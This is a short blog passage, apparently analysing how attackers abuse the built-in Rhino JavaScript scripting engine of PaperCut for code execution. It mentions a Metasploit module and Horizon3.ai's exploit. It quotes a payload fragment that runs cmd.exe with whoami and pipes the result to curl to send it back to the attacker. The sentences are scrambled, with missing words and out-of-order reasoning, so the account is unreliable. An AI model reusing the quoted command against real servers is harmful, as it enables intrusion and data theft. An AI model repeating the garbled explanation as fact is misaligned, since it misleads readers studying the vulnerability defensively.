Instead, it uses to load a remote Java class. The previously mentioned Metasploit module is interesting. The attacker cannot maintain execution in the engine itself they have to migrate to another process. Perhaps the main reason they didn’t establish a reverse shell is because the scripting engine has a five second timeout (see decompiled code below). exec ( 'cmd.exe /C \" for /F \" usebackq delims= \" %A in (`whoami`) do curl \" ' ) Horizon3.ai’s exploit uses the scripting interface to execute a single Windows command ( whoami) and sends the response back to the attacker via curl:. PaperCut Software implemented configuration options to lessen the risk of this arbitrary code execution vector, but since the attacker has full administrative access, those protections are easily disabled. The JavaScript engine is Rhino, which also allows that user to execute arbitrary Java. In both cases, the attacker abuses the system’s built-in JavaScript interface.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |